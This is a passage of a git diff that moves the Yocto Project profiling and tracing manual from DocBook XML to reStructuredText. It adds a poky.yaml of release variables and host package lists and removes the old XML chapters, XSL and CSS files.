-     ccache perl-Data-Dumper perl-Text-ParseWords perl-Thread-Queue perl-bignum socat \
-     python3-pexpect findutils which file cpio python python3-pip xz python3-GitPython \
-     python3-jinja2 SDL-devel xterm rpcgen">
-<!ENTITY OPENSUSE_HOST_PACKAGES_ESSENTIAL "python gcc gcc-c++ git chrpath make wget python-xml \
-     diffstat makeinfo python-curses patch socat python3 python3-curses tar python3-pip \
-     python3-pexpect xz which python3-Jinja2 Mesa-libEGL1 libSDL-devel xterm rpcgen
-     $ sudo pip3 install GitPython">
-<!ENTITY CENTOS7_HOST_PACKAGES_ESSENTIAL "-y epel-release
-     $ sudo yum makecache
-     $ sudo yum install gawk make wget tar bzip2 gzip python3 unzip perl patch \
-     diffutils diffstat git cpp gcc gcc-c++ glibc-devel texinfo chrpath socat \
-     perl-Data-Dumper perl-Text-ParseWords perl-Thread-Queue python36-pip xz \
-     which SDL-devel xterm
-     $ sudo pip3 install GitPython jinja2">
-<!ENTITY CENTOS8_HOST_PACKAGES_ESSENTIAL "-y epel-release
-     $ sudo dnf config-manager --set-enabled PowerTools
-     $ sudo dnf makecache
-     $ sudo dnf install gawk make wget tar bzip2 gzip python3 unzip perl patch \
-     diffutils diffstat git cpp gcc gcc-c++ glibc-devel texinfo chrpath ccache \
-     socat perl-Data-Dumper perl-Text-ParseWords perl-Thread-Queue python3-pip \
-     python3-GitPython python3-jinja2 python3-pexpect xz which SDL-devel xterm \
-     rpcgen">
diff --git a/documentation/poky.yaml b/documentation/poky.yaml
new file mode 100644
index 0000000000..0ab046428b
--- /dev/null
+++ b/documentation/poky.yaml
@@ -0,0 +1,44 @@
+DISTRO : "3.1.33"
+DISTRO_NAME_NO_CAP : "dunfell"
+DISTRO_NAME : "Dunfell"
+DISTRO_NAME_NO_CAP_MINUS_ONE : "zeus"
+YOCTO_DOC_VERSION : "3.1.33"
+YOCTO_DOC_VERSION_MINUS_ONE : "3.0.4"
+DISTRO_REL_TAG : "yocto-3.1.33"
+DOCCONF_VERSION : "3.1.33"
+BITBAKE_SERIES : "1.46"
+POKYVERSION : "23.0.33"
+YOCTO_POKY : "poky-&DISTRO_NAME_NO_CAP;-&POKYVERSION;"
+YOCTO_DL_URL : "https://downloads.yoctoproject.org"
+YOCTO_AB_URL : "https://autobuilder.yoctoproject.org"
+YOCTO_RELEASE_DL_URL : "&YOCTO_DL_URL;/releases/yocto/yocto-&DISTRO;"
+UBUNTU_HOST_PACKAGES_ESSENTIAL : "gawk wget git-core diffstat unzip texinfo gcc-multilib \
+     build-essential chrpath socat cpio python3 python3-pip python3-pexpect \
+     xz-utils debianutils iputils-ping python3-git python3-jinja2 libegl1-mesa libsdl1.2-dev \
+     pylint3 xterm python3-subunit mesa-common-dev"
+FEDORA_HOST_PACKAGES_ESSENTIAL : "gawk make wget tar bzip2 gzip python3 unzip perl patch \
+     diffutils diffstat git cpp gcc gcc-c++ glibc-devel texinfo chrpath \
+     ccache perl-Data-Dumper perl-Text-ParseWords perl-Thread-Queue perl-bignum socat \
+     python3-pexpect findutils which file cpio python python3-pip xz python3-GitPython \
+     python3-jinja2 SDL-devel xterm rpcgen mesa-libGL-devel perl-FindBin perl-File-Compare \
+     perl-File-Copy perl-locale"
+OPENSUSE_HOST_PACKAGES_ESSENTIAL : "python gcc gcc-c++ git chrpath make wget python-xml \
+     diffstat makeinfo python-curses patch socat python3 python3-curses tar python3-pip \
+     python3-pexpect xz which python3-Jinja2 Mesa-libEGL1 libSDL-devel xterm rpcgen Mesa-dri-devel
+     \n\      $ sudo pip3 install GitPython"
+CENTOS7_HOST_PACKAGES_ESSENTIAL : "-y epel-release
+     \n\      $ sudo yum makecache
+     \n\      $ sudo yum install gawk make wget tar bzip2 gzip python3 unzip perl patch \
+     diffutils diffstat git cpp gcc gcc-c++ glibc-devel texinfo chrpath socat \
+     perl-Data-Dumper perl-Text-ParseWords perl-Thread-Queue python36-pip xz \
+     which SDL-devel xterm mesa-libGL-devel
+     \n\      $ sudo pip3 install GitPython jinja2"
+CENTOS8_HOST_PACKAGES_ESSENTIAL : "-y epel-release
+     \n\      $ sudo dnf config-manager --set-enabled PowerTools
+     \n\      $ sudo dnf makecache
+     \n\      $ sudo dnf install gawk make wget tar bzip2 gzip python3 unzip perl patch \
+     diffutils diffstat git cpp gcc gcc-c++ glibc-devel texinfo chrpath ccache \
+     socat perl-Data-Dumper perl-Text-ParseWords perl-Thread-Queue python3-pip \
+     python3-GitPython python3-jinja2 python3-pexpect xz which SDL-devel xterm \
+     rpcgen mesa-libGL-devel"
+PIP3_HOST_PACKAGES_DOC : "$ sudo pip3 install sphinx sphinx_rtd_theme pyyaml"
diff --git a/documentation/profile-manual/history.rst b/documentation/profile-manual/history.rst
new file mode 100644
index 0000000000..c4c64ff288
--- /dev/null
+++ b/documentation/profile-manual/history.rst
@@ -0,0 +1,70 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+***********************
+Manual Revision History
+***********************
+
+.. list-table::
+   :widths: 10 15 40
+   :header-rows: 1
+
+   * - Revision
+     - Date
+     - Note
+   * - 1.4
+     - April 2013
+     - The initial document released with the Yocto Project 1.4 Release
+   * - 1.5
+     - October 2013
+     - Released with the Yocto Project 1.5 Release.
+   * - 1.6
+     - April 2014
+     - Released with the Yocto Project 1.6 Release.
+   * - 1.7
+     - October 2014
+     - Released with the Yocto Project 1.7 Release.
+   * - 1.8
+     - April 2015
+     - Released with the Yocto Project 1.8 Release.
+   * - 2.0
+     - October 2015
+     - Released with the Yocto Project 2.0 Release.
+   * - 2.1
+     - April 2016
+     - Released with the Yocto Project 2.1 Release.
+   * - 2.2
+     - October 2016
+     - Released with the Yocto Project 2.2 Release.
+   * - 2.3
+     - May 2017
+     - Released with the Yocto Project 2.3 Release.
+   * - 2.4
+     - October 2017
+     - Released with the Yocto Project 2.4 Release.
+   * - 2.5
+     - May 2018
+     - Released with the Yocto Project 2.5 Release.
+   * - 2.6
+     - November 2018
+     - Released with the Yocto Project 2.6 Release.
+   * - 2.7
+     - May 2019
+     - Released with the Yocto Project 2.7 Release.
+   * - 3.0
+     - October 2019
+     - Released with the Yocto Project 3.0 Release.
+   * - 3.1
+     - April 2020
+     - Released with the Yocto Project 3.1 Release.
+   * - 3.1.1
+     - June 2020
+     - Released with the Yocto Project 3.1.1 Release.
+   * - 3.1.2
+     - August 2020
+     - Released with the Yocto Project 3.1.2 Release.
+   * - 3.1.3
+     - September 2020
+     - Released with the Yocto Project 3.1.3 Release.
+   * - 3.1.4
+     - November 2020
+     - Released with the Yocto Project 3.1.4 Release.
diff --git a/documentation/profile-manual/profile-manual-arch.rst b/documentation/profile-manual/profile-manual-arch.rst
new file mode 100644
index 0000000000..73cd0c29e5
--- /dev/null
+++ b/documentation/profile-manual/profile-manual-arch.rst
@@ -0,0 +1,29 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*************************************************************
+Overall Architecture of the Linux Tracing and Profiling Tools
+*************************************************************
+
+Architecture of the Tracing and Profiling Tools
+===============================================
+
+It may seem surprising to see a section covering an 'overall
+architecture' for what seems to be a random collection of tracing tools
+that together make up the Linux tracing and profiling space. The fact
+is, however, that in recent years this seemingly disparate set of tools
+has started to converge on a 'core' set of underlying mechanisms:
+
+-  static tracepoints
+-  dynamic tracepoints
+
+   -  kprobes
+   -  uprobes
+
+-  the perf_events subsystem
+-  debugfs
+
+.. admonition:: Tying it Together
+
+   Rather than enumerating here how each tool makes use of these common
+   mechanisms, textboxes like this will make note of the specific usages
+   in each tool as they come up in the course of the text.
diff --git a/documentation/profile-manual/profile-manual-arch.xml b/documentation/profile-manual/profile-manual-arch.xml
deleted file mode 100644
index 19d1155229..0000000000
--- a/documentation/profile-manual/profile-manual-arch.xml
+++ /dev/null
@@ -1,45 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='profile-manual-arch'>
-
-<title>Overall Architecture of the Linux Tracing and Profiling Tools</title>
-
-<section id='architecture-of-the-tracing-and-profiling-tools'>
-    <title>Architecture of the Tracing and Profiling Tools</title>
-
-    <para>
-        It may seem surprising to see a section covering an 'overall architecture'
-        for what seems to be a random collection of tracing tools that together
-        make up the Linux tracing and profiling space.
-        The fact is, however, that in recent years this seemingly disparate
-        set of tools has started to converge on a 'core' set of underlying
-        mechanisms:
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>static tracepoints</listitem>
-            <listitem>dynamic tracepoints
-                 <itemizedlist>
-                     <listitem>kprobes</listitem>
-                     <listitem>uprobes</listitem>
-                 </itemizedlist>
-            </listitem>
-            <listitem>the perf_events subsystem</listitem>
-            <listitem>debugfs</listitem>
-        </itemizedlist>
-    </para>
-
-    <informalexample>
-        <emphasis>Tying it Together:</emphasis> Rather than enumerating here how each tool makes use of
-        these common mechanisms, textboxes like this will make note of the
-        specific usages in each tool as they come up in the course
-        of the text.
-    </informalexample>
-</section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/profile-manual/profile-manual-customization.xsl b/documentation/profile-manual/profile-manual-customization.xsl
deleted file mode 100644
index caa57ef342..0000000000
--- a/documentation/profile-manual/profile-manual-customization.xsl
+++ /dev/null
@@ -1,27 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
-  <xsl:import href="http://downloads.yoctoproject.org/mirror/docbook-mirror/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-<!--
-
-  <xsl:import href="../template/1.76.1/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-  <xsl:import href="http://docbook.sourceforge.net/release/xsl/1.76.1/xhtml/docbook.xsl" />
-
--->
-
-  <xsl:include href="../template/permalinks.xsl"/>
-  <xsl:include href="../template/section.title.xsl"/>
-  <xsl:include href="../template/component.title.xsl"/>
-  <xsl:include href="../template/division.title.xsl"/>
-  <xsl:include href="../template/formal.object.heading.xsl"/>
-
-  <xsl:param name="html.stylesheet" select="'profile-manual-style.css'" />
-  <xsl:param name="chapter.autolabel" select="1" />
-  <xsl:param name="appendix.autolabel" select="A" />
-  <xsl:param name="section.autolabel" select="1" />
-  <xsl:param name="section.label.includes.component.label" select="1" />
-  <xsl:param name="generate.id.attributes" select="1" />
-
-</xsl:stylesheet>
diff --git a/documentation/profile-manual/profile-manual-examples.rst b/documentation/profile-manual/profile-manual-examples.rst
new file mode 100644
index 0000000000..97a9e9e21a
--- /dev/null
+++ b/documentation/profile-manual/profile-manual-examples.rst
@@ -0,0 +1,24 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*******************
+Real-World Examples
+*******************
+
+|
+
+This chapter contains real-world examples.
+
+Slow Write Speed on Live Images
+===============================
+
+In one of our previous releases (denzil), users noticed that booting off
+of a live image and writing to disk was noticeably slower. This included
+the boot itself, especially the first one, since first boots tend to do
+a significant amount of writing due to certain post-install scripts.
+
+The problem (and solution) was discovered by using the Yocto tracing
+tools, in this case 'perf stat', 'perf script', 'perf record' and 'perf
+report'.
+
+See all the unvarnished details of how this bug was diagnosed and solved
+here: Yocto Bug #3049
diff --git a/documentation/profile-manual/profile-manual-examples.xml b/documentation/profile-manual/profile-manual-examples.xml
deleted file mode 100644
index 9630c6c307..0000000000
--- a/documentation/profile-manual/profile-manual-examples.xml
+++ /dev/null
@@ -1,39 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='profile-manual-examples'>
-
-<title>Real-World Examples</title>
-
-<para>
-    This chapter contains real-world examples.
-</para>
-
-<section id='slow-write-speed-on-live-images'>
-    <title>Slow Write Speed on Live Images</title>
-
-    <para>
-        In one of our previous releases (denzil), users noticed that booting
-        off of a live image and writing to disk was noticeably slower.
-        This included the boot itself, especially the first one, since first
-        boots tend to do a significant amount of writing due to certain
-        post-install scripts.
-    </para>
-
-    <para>
-        The problem (and solution) was discovered by using the Yocto tracing
-        tools, in this case 'perf stat', 'perf script', 'perf record'
-        and 'perf report'.
-    </para>
-
-    <para>
-        See all the unvarnished details of how this bug was diagnosed and
-        solved here: Yocto Bug #3049
-    </para>
-</section>
-
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/profile-manual/profile-manual-intro.rst b/documentation/profile-manual/profile-manual-intro.rst
new file mode 100644
index 0000000000..0d435e0c0c
--- /dev/null
+++ b/documentation/profile-manual/profile-manual-intro.rst
@@ -0,0 +1,79 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+******************************************
+Yocto Project Profiling and Tracing Manual
+******************************************
+
+.. _profile-intro:
+
+Introduction
+============
+
+Yocto bundles a number of tracing and profiling tools - this 'HOWTO'
+describes their basic usage and shows by example how to make use of them
+to examine application and system behavior.
+
+The tools presented are for the most part completely open-ended and have
+quite good and/or extensive documentation of their own which can be used
+to solve just about any problem you might come across in Linux. Each
+section that describes a particular tool has links to that tool's
+documentation and website.
+
+The purpose of this 'HOWTO' is to present a set of common and generally
+useful tracing and profiling idioms along with their application (as
+appropriate) to each tool, in the context of a general-purpose
+'drill-down' methodology that can be applied to solving a large number
+(90%?) of problems. For help with more advanced usages and problems,
+please see the documentation and/or websites listed for each tool.
+
+The final section of this 'HOWTO' is a collection of real-world examples
+which we'll be continually adding to as we solve more problems using the
+tools - feel free to add your own examples to the list!
+
+.. _profile-manual-general-setup:
+
+General Setup
+=============
+
+Most of the tools are available only in 'sdk' images or in images built
+after adding 'tools-profile' to your local.conf. So, in order to be able
+to access all of the tools described here, please first build and boot
+an 'sdk' image e.g. ::
+
+   $ bitbake core-image-sato-sdk
+
+or alternatively by adding 'tools-profile' to the EXTRA_IMAGE_FEATURES line in
+your local.conf: ::
+
+   EXTRA_IMAGE_FEATURES = "debug-tweaks tools-profile"
+
+If you use the 'tools-profile' method, you don't need to build an sdk image -
+the tracing and profiling tools will be included in non-sdk images as well e.g.: ::
+
+   $ bitbake core-image-sato
+
+.. note::
+
+   By default, the Yocto build system strips symbols from the binaries
+   it packages, which makes it difficult to use some of the tools.
+
+   You can prevent that by setting the
+   :term:`INHIBIT_PACKAGE_STRIP`
+   variable to "1" in your ``local.conf`` when you build the image: ::
+
+      INHIBIT_PACKAGE_STRIP = "1"
+
+   The above setting will noticeably increase the size of your image.
+
+If you've already built a stripped image, you can generate debug
+packages (xxx-dbg) which you can manually install as needed.
+
+To generate debug info for packages, you can add dbg-pkgs to
+EXTRA_IMAGE_FEATURES in local.conf. For example: ::
+
+   EXTRA_IMAGE_FEATURES = "debug-tweaks tools-profile dbg-pkgs"
+
+Additionally, in order to generate the right type of debuginfo, we also need to
+set :term:`PACKAGE_DEBUG_SPLIT_STYLE` in the ``local.conf`` file: ::
+
+   PACKAGE_DEBUG_SPLIT_STYLE = 'debug-file-directory'
diff --git a/documentation/profile-manual/profile-manual-intro.xml b/documentation/profile-manual/profile-manual-intro.xml
deleted file mode 100644
index f16db3f0f2..0000000000
--- a/documentation/profile-manual/profile-manual-intro.xml
+++ /dev/null
@@ -1,106 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='profile-manual-intro'>
-
-<title>Yocto Project Profiling and Tracing Manual</title>
-    <section id='profile-intro'>
-        <title>Introduction</title>
-
-        <para>
-            Yocto bundles a number of tracing and profiling tools - this 'HOWTO'
-            describes their basic usage and shows by example how to make use
-            of them to examine application and system behavior.
-        </para>
-
-        <para>
-            The tools presented are for the most part completely open-ended and
-            have quite good and/or extensive documentation of their own which
-            can be used to solve just about any problem you might come across
-            in Linux.
-            Each section that describes a particular tool has links to that
-            tool's documentation and website.
-        </para>
-
-        <para>
-            The purpose of this 'HOWTO' is to present a set of common and
-            generally useful tracing and profiling idioms along with their
-            application (as appropriate) to each tool, in the context of a
-            general-purpose 'drill-down' methodology that can be applied
-            to solving a large number (90%?) of problems.
-            For help with more advanced usages and problems, please see
-            the documentation and/or websites listed for each tool.
-        </para>
-
-        <para>
-            The final section of this 'HOWTO' is a collection of real-world
-            examples which we'll be continually adding to as we solve more
-            problems using the tools - feel free to add your own examples
-            to the list!
-        </para>
-    </section>
-
-    <section id='profile-manual-general-setup'>
-        <title>General Setup</title>
-
-        <para>
-            Most of the tools are available only in 'sdk' images or in images
-            built after adding 'tools-profile' to your local.conf.
-            So, in order to be able to access all of the tools described here,
-            please first build and boot an 'sdk' image e.g.
-            <literallayout class='monospaced'>
-     $ bitbake core-image-sato-sdk
-            </literallayout>
-            or alternatively by adding 'tools-profile' to the
-            EXTRA_IMAGE_FEATURES line in your local.conf:
-            <literallayout class='monospaced'>
-      EXTRA_IMAGE_FEATURES = "debug-tweaks tools-profile"
-            </literallayout>
-            If you use the 'tools-profile' method, you don't need to build an
-            sdk image - the tracing and profiling tools will be included in
-            non-sdk images as well e.g.:
-            <literallayout class='monospaced'>
-     $ bitbake core-image-sato
-            </literallayout>
-            <note><para>
-                By default, the Yocto build system strips symbols from the
-                binaries it packages, which makes it difficult to use some
-                of the tools.
-                </para><para>You can prevent that by setting the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-INHIBIT_PACKAGE_STRIP'><filename>INHIBIT_PACKAGE_STRIP</filename></ulink>
-                variable to "1" in your
-                <filename>local.conf</filename> when you build the image:
-                </para>
-            </note>
-            <literallayout class='monospaced'>
-     INHIBIT_PACKAGE_STRIP = "1"
-            </literallayout>
-            The above setting will noticeably increase the size of your image.
-        </para>
-
-        <para>
-            If you've already built a stripped image, you can generate
-            debug packages (xxx-dbg) which you can manually install as
-            needed.
-        </para>
-
-        <para>
-            To generate debug info for packages, you can add dbg-pkgs to
-            EXTRA_IMAGE_FEATURES in local.conf. For example:
-            <literallayout class='monospaced'>
-     EXTRA_IMAGE_FEATURES = "debug-tweaks tools-profile dbg-pkgs"
-            </literallayout>
-            Additionally, in order to generate the right type of
-            debuginfo, we also need to set
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_DEBUG_SPLIT_STYLE'><filename>PACKAGE_DEBUG_SPLIT_STYLE</filename></ulink>
-            in the <filename>local.conf</filename> file:
-            <literallayout class='monospaced'>
-     PACKAGE_DEBUG_SPLIT_STYLE = 'debug-file-directory'
-            </literallayout>
-        </para>
-    </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/profile-manual/profile-manual-style.css b/documentation/profile-manual/profile-manual-style.css
deleted file mode 100644
index f3cca8536d..0000000000
--- a/documentation/profile-manual/profile-manual-style.css
+++ /dev/null
@@ -1,984 +0,0 @@
-/*
-   Generic XHTML / DocBook XHTML CSS Stylesheet.
-
-   Browser wrangling and typographic design by
-      Oyvind Kolas / pippin@gimp.org
-
-   Customised for Poky by
-      Matthew Allum / mallum@o-hand.com
-
-   Thanks to:
-     Liam R. E. Quin
-     William Skaggs
-     Jakub Steiner
-
-   Structure
-   ---------
-
-   The stylesheet is divided into the following sections:
-
-       Positioning
-          Margins, paddings, width, font-size, clearing.
-       Decorations
-          Borders, style
-       Colors
-          Colors
-       Graphics
-          Graphical backgrounds
-       Nasty IE tweaks
-          Workarounds needed to make it work in internet explorer,
-          currently makes the stylesheet non validating, but up until
-          this point it is validating.
-       Mozilla extensions
-          Transparency for footer
-	  Rounded corners on boxes
-
-*/
-
-
-  /*************** /
- /  Positioning   /
-/ ***************/
-
-body {
-  font-family: Verdana, Sans, sans-serif;
-
-  min-width: 640px;
-  width: 80%;
-  margin:  0em auto;
-  padding: 2em 5em 5em 5em;
-  color: #333;
-}
-
-h1,h2,h3,h4,h5,h6,h7 {
-  font-family: Arial, Sans;
-  color: #00557D;
-  clear: both;
-}
-
-h1 {
-  font-size: 2em;
-  text-align: left;
-  padding: 0em 0em 0em 0em;
-  margin: 2em 0em 0em 0em;
-}
-
-h2.subtitle {
-  margin: 0.10em 0em 3.0em 0em;
-  padding: 0em 0em 0em 0em;
-  font-size: 1.8em;
-  padding-left: 20%;
-  font-weight: normal;
-  font-style: italic;
-}
-
-h2 {
-  margin: 2em 0em 0.66em 0em;
-  padding: 0.5em 0em 0em 0em;
-  font-size: 1.5em;
-  font-weight: bold;
-}
-
-h3.subtitle {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-  font-size: 142.14%;
-  text-align: right;
-}
-
-h3 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 140%;
-  font-weight: bold;
-}
-
-h4 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 120%;
-  font-weight: bold;
-}
-
-h5 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 110%;
-  font-weight: bold;
-}
-
-h6 {
-  margin: 1em 0em 0em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 110%;
-  font-weight: bold;
-}
-
-.authorgroup {
-  background-color: transparent;
-  background-repeat: no-repeat;
-  padding-top: 256px;
-  background-image: url("figures/profile-title.png");
-  background-position: left top;
-  margin-top: -256px;
-  padding-right: 50px;
-  margin-left: 0px;
-  text-align: right;
-  width: 740px;
-}
-
-h3.author {
-  margin: 0em 0me 0em 0em;
-  padding: 0em 0em 0em 0em;
-  font-weight: normal;
-  font-size: 100%;
-  color: #333;
-  clear: both;
-}
-
-.author tt.email {
-  font-size: 66%;
-}
-
-.titlepage hr {
-  width: 0em;
-  clear: both;
-}
-
-.revhistory {
-  padding-top: 2em;
-  clear: both;
-}
-
-.toc,
-.list-of-tables,
-.list-of-examples,
-.list-of-figures {
-  padding: 1.33em 0em 2.5em 0em;
-  color: #00557D;
-}
-
-.toc p,
-.list-of-tables p,
-.list-of-figures p,
-.list-of-examples p {
-  padding: 0em 0em 0em 0em;
-  padding: 0em 0em 0.3em;
-  margin: 1.5em 0em 0em 0em;
-}
-
-.toc p b,
-.list-of-tables p b,
-.list-of-figures p b,
-.list-of-examples p b{
-  font-size: 100.0%;
-  font-weight: bold;
-}
-
-.toc dl,
-.list-of-tables dl,
-.list-of-figures dl,
-.list-of-examples dl {
-  margin: 0em 0em 0.5em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.toc dt {
-  margin: 0em 0em 0em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.toc dd {
-  margin: 0em 0em 0em 2.6em;
-  padding: 0em 0em 0em 0em;
-}
-
-div.glossary dl,
-div.variablelist dl {
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
-  font-weight: normal;
-  width: 20em;
-  text-align: right;
-}
-
-.variablelist dl dt {
-  margin-top: 0.5em;
-}
-
-.glossary dl dd,
-.variablelist dl dd {
-  margin-top: -1em;
-  margin-left: 25.5em;
-}
-
-.glossary dd p,
-.variablelist dd p {
-  margin-top: 0em;
-  margin-bottom: 1em;
-}
-
-
-div.calloutlist table td {
-  padding: 0em 0em 0em 0em;
-  margin: 0em 0em 0em 0em;
-}
-
-div.calloutlist table td p {
-  margin-top: 0em;
-  margin-bottom: 1em;
-}
-
-div p.copyright {
-  text-align: left;
-}
-
-div.legalnotice p.legalnotice-title {
-  margin-bottom: 0em;
-}
-
-p {
-  line-height: 1.5em;
-  margin-top: 0em;
-
-}
-
-dl {
-  padding-top: 0em;
-}
-
-hr {
-  border: solid 1px;
-}
-
-
-.mediaobject,
-.mediaobjectco {
-  text-align: center;
-}
-
-img {
-  border: none;
-}
-
-ul {
-  padding: 0em 0em 0em 1.5em;
-}
-
-ul li {
-  padding: 0em 0em 0em 0em;
-}
-
-ul li p {
-  text-align: left;
-}
-
-table {
-  width :100%;
-}
-
-th {
-  padding: 0.25em;
-  text-align: left;
-  font-weight: normal;
-  vertical-align: top;
-}
-
-td {
-  padding: 0.25em;
-  vertical-align: top;
-}
-
-p a[id] {
-  margin: 0px;
-  padding: 0px;
-  display: inline;
-  background-image: none;
-}
-
-a {
-  text-decoration: underline;
-  color: #444;
-}
-
-pre {
-    overflow: auto;
-}
-
-a:hover {
-  text-decoration: underline;
-  /*font-weight: bold;*/
-}
-
-/* This style defines how the permalink character
-   appears by itself and when hovered over with
-   the mouse. */
-
-[alt='Permalink'] { color: #eee; }
-[alt='Permalink']:hover { color: black; }
-
-
-div.informalfigure,
-div.informalexample,
-div.informaltable,
-div.figure,
-div.table,
-div.example {
-  margin: 1em 0em;
-  padding: 1em;
-  page-break-inside: avoid;
-}
-
-
-div.informalfigure p.title b,
-div.informalexample p.title b,
-div.informaltable p.title b,
-div.figure p.title b,
-div.example p.title b,
-div.table p.title b{
-    padding-top: 0em;
-    margin-top: 0em;
-    font-size: 100%;
-    font-weight: normal;
-}
-
-.mediaobject .caption,
-.mediaobject .caption p  {
-  text-align: center;
-  font-size: 80%;
-  padding-top: 0.5em;
-  padding-bottom: 0.5em;
-}
-
-.epigraph {
-  padding-left: 55%;
-  margin-bottom: 1em;
-}
-
-.epigraph p {
-  text-align: left;
-}
-
-.epigraph .quote {
-  font-style: italic;
-}
-.epigraph .attribution {
-  font-style: normal;
-  text-align: right;
-}
-
-span.application {
-  font-style: italic;
-}
-
-.programlisting {
-  font-family: monospace;
-  font-size: 80%;
-  white-space: pre;
-  margin: 1.33em 0em;
-  padding: 1.33em;
-}
-
-.tip,
-.warning,
-.caution,
-.note {
-  margin-top: 1em;
-  margin-bottom: 1em;
-
-}
-
-/* force full width of table within div */
-.tip table,
-.warning table,
-.caution table,
-.note table {
-  border: none;
-  width: 100%;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  padding: 0.8em 0.0em 0.0em 0.0em;
-  margin : 0em 0em 0em 0em;
-}
-
-.tip p,
-.warning p,
-.caution p,
-.note p {
-  margin-top: 0.5em;
-  margin-bottom: 0.5em;
-  padding-right: 1em;
-  text-align: left;
-}
-
-.acronym {
-  text-transform: uppercase;
-}
-
-b.keycap,
-.keycap {
-  padding: 0.09em 0.3em;
-  margin: 0em;
-}
-
-.itemizedlist li {
-  clear: none;
-}
-
-.filename {
-  font-size: medium;
-  font-family: Courier, monospace;
-}
-
-
-div.navheader, div.heading{
-  position: absolute;
-  left: 0em;
-  top: 0em;
-  width: 100%;
-  background-color: #cdf;
-  width: 100%;
-}
-
-div.navfooter, div.footing{
-  position: fixed;
-  left: 0em;
-  bottom: 0em;
-  background-color: #eee;
-  width: 100%;
-}
-
-
-div.navheader td,
-div.navfooter td {
-  font-size: 66%;
-}
-
-div.navheader table th {
-  /*font-family: Georgia, Times, serif;*/
-  /*font-size: x-large;*/
-  font-size: 80%;
-}
-
-div.navheader table {
-  border-left: 0em;
-  border-right: 0em;
-  border-top: 0em;
-  width: 100%;
-}
-
-div.navfooter table {
-  border-left: 0em;
-  border-right: 0em;
-  border-bottom: 0em;
-  width: 100%;
-}
-
-div.navheader table td a,
-div.navfooter table td a {
-  color: #777;
-  text-decoration: none;
-}
-
-/* normal text in the footer */
-div.navfooter table td {
-  color: black;
-}
-
-div.navheader table td a:visited,
-div.navfooter table td a:visited {
-  color: #444;
-}
-
-
-/* links in header and footer */
-div.navheader table td a:hover,
-div.navfooter table td a:hover {
-  text-decoration: underline;
-  background-color: transparent;
-  color: #33a;
-}
-
-div.navheader hr,
-div.navfooter hr {
-  display: none;
-}
-
-
-.qandaset tr.question td p {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.qandaset tr.answer td p {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-}
-.answer td {
-  padding-bottom: 1.5em;
-}
-
-.emphasis {
-  font-weight: bold;
-}
-
-
-  /************* /
- / decorations  /
-/ *************/
-
-.titlepage {
-}
-
-.part .title {
-}
-
-.subtitle {
-    border: none;
-}
-
-/*
-h1 {
-  border: none;
-}
-
-h2 {
-  border-top: solid 0.2em;
-  border-bottom: solid 0.06em;
-}
-
-h3 {
-  border-top: 0em;
-  border-bottom: solid 0.06em;
-}
-
-h4 {
-  border: 0em;
-  border-bottom: solid 0.06em;
-}
-
-h5 {
-  border: 0em;
-}
-*/
-
-.programlisting {
-  border: solid 1px;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example {
-  border: 1px solid;
-}
-
-
-
-.tip,
-.warning,
-.caution,
-.note {
-  border: 1px solid;
-}
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  border-bottom: 1px solid;
-}
-
-.question td {
-  border-top: 1px solid black;
-}
-
-.answer {
-}
-
-
-b.keycap,
-.keycap {
-  border: 1px solid;
-}
-
-
-div.navheader, div.heading{
-  border-bottom: 1px solid;
-}
-
-
-div.navfooter, div.footing{
-  border-top: 1px solid;
-}
-
-  /********* /
- /  colors  /
-/ *********/
-
-body {
-  color: #333;
-  background: white;
-}
-
-a {
-  background: transparent;
-}
-
-a:hover {
-  background-color: #dedede;
-}
-
-
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7,
-h8 {
-  background-color: transparent;
-}
-
-hr {
-  border-color: #aaa;
-}
-
-
-.tip, .warning, .caution, .note {
-  border-color: #fff;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
